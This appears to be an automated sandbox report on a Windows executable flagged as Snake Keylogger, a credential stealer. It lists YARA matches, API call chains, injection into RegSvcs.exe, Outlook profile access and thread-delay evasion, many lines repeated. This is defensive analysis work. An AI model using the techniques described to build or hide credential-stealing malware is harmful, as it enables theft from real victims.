Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.CMR_7649.EXE.exe.3760000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.CMR_7649.EXE.exe.3760000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.CMR_7649.EXE.exe.3760000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.CMR_7649.EXE.exe.3760000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.CMR_7649.EXE.exe.3760000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.CMR_7649.EXE.exe.3760000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: Process Memory Space: CMR_7649.EXE.exe PID: 6888, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 3152, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_004096A0 0_2_004096A0
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0042200C 0_2_0042200C
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0041A217 0_2_0041A217
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_00412216 0_2_00412216
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0042435D 0_2_0042435D
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_004033C0 0_2_004033C0
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0044F430 0_2_0044F430
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_004125E8 0_2_004125E8
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0044663B 0_2_0044663B
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_00413801 0_2_00413801
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0042096F 0_2_0042096F
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_004129D0 0_2_004129D0
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_004119E3 0_2_004119E3
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0041C9AE 0_2_0041C9AE
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0047EA6F 0_2_0047EA6F
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0040FA10 0_2_0040FA10
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0044EB59 0_2_0044EB59
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_00423C81 0_2_00423C81
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_00411E78 0_2_00411E78
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_00442E0C 0_2_00442E0C
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_00420EC0 0_2_00420EC0
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0044CF17 0_2_0044CF17
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_00444FD2 0_2_00444FD2
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_03EDF630 0_2_03EDF630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01397118 1_2_01397118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0139C147 1_2_0139C147
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0139A088 1_2_0139A088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01395362 1_2_01395362
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0139D278 1_2_0139D278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0139C468 1_2_0139C468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0139C738 1_2_0139C738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013969A0 1_2_013969A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0139E988 1_2_0139E988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0139CA08 1_2_0139CA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01393AA1 1_2_01393AA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0139CCD8 1_2_0139CCD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0139CFAA 1_2_0139CFAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0139F631 1_2_0139F631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0139E97A 1_2_0139E97A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013939F0 1_2_013939F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013929EC 1_2_013929EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0139FA88 1_2_0139FA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01393E09 1_2_01393E09
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: String function: 004115D7 appears 36 times
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: String function: 00416C70 appears 39 times
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: String function: 00445AE0 appears 65 times
Source: CMR_7649.EXE.exe, 00000000.00000003.1689258711.000000000489D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs CMR_7649.EXE.exe
Source: CMR_7649.EXE.exe, 00000000.00000003.1687634167.00000000046F3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs CMR_7649.EXE.exe
Source: CMR_7649.EXE.exe, 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs CMR_7649.EXE.exe
Source: CMR_7649.EXE.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.CMR_7649.EXE.exe.3760000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.CMR_7649.EXE.exe.3760000.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.CMR_7649.EXE.exe.3760000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.CMR_7649.EXE.exe.3760000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.CMR_7649.EXE.exe.3760000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.CMR_7649.EXE.exe.3760000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: Process Memory Space: CMR_7649.EXE.exe PID: 6888, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 3152, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.CMR_7649.EXE.exe.3760000.1.raw.unpack, ----.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.CMR_7649.EXE.exe.3760000.1.raw.unpack, ----.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.CMR_7649.EXE.exe.3760000.1.raw.unpack, -U.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | File created: C:\Users\user\AppData\Local\Temp\savager
Source: CMR_7649.EXE.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: CMR_7649.EXE.exe | ReversingLabs: Detection: 28%
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | File read: C:\Users\user\Desktop\CMR_7649.EXE.exe
Source: unknown | Process created: C:\Users\user\Desktop\CMR_7649.EXE.exe "C:\Users\user\Desktop\CMR_7649.EXE.exe"
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\CMR_7649.EXE.exe"
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: CMR_7649.EXE.exe | Static file information: File size 1237203 > 1048576
Source: Binary string: wntdll.pdbUGP source: CMR_7649.EXE.exe, 00000000.00000003.1689749909.0000000004770000.00000004.00001000.00020000.00000000.sdmp, CMR_7649.EXE.exe, 00000000.00000003.1689561661.00000000045D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: CMR_7649.EXE.exe, 00000000.00000003.1689749909.0000000004770000.00000004.00001000.00020000.00000000.sdmp, CMR_7649.EXE.exe, 00000000.00000003.1689561661.00000000045D0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
Source: CMR_7649.EXE.exe | Static PE information: real checksum: 0xa961f should be: 0x12e812
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_00462463 push edi; ret 0_2_00462465
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | API/Special instruction interceptor: Address: 3EDF254
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599891
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599766
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599657
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599532
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599422
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599313
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599063
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598938
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598813
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598703
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598594
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598469
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598115
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597985
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597735
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597485
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597365
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597110
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596985
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596735
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596485
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596360
